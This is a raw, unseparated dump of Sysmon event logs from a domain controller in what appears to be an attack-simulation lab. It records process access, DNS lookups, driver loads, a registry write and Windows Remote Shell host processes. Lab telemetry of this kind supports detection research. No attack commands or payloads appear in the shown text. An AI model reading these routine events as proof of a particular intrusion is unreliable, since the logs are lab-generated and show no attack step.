13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-42A6-6000-7E00-000000009A01}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A6-6000-7E00-000000009A01}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.967{08A6967A-42A6-6000-7E00-000000009A01}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:00.447{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:00.446{08A6967A-4288-6000-1500-000000009A01}1324_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:00.446{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 644600x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:24.307C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:25.385C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:24.307C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:03.321{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:03.321{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:03.321{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:07.914{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:07.914{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:07.914{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\Global Catalog Promotion CompleteDWORD (0x00000001) 10341000x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.680{08A6967A-4288-6000-1500-000000009A01}13241976C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.680{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.664{08A6967A-42B0-6000-8500-000000009A01}42804300C:\Windows\system32\conhost.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.649{08A6967A-4288-6000-1500-000000009A01}13242460C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8200-000000009A01}4204C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 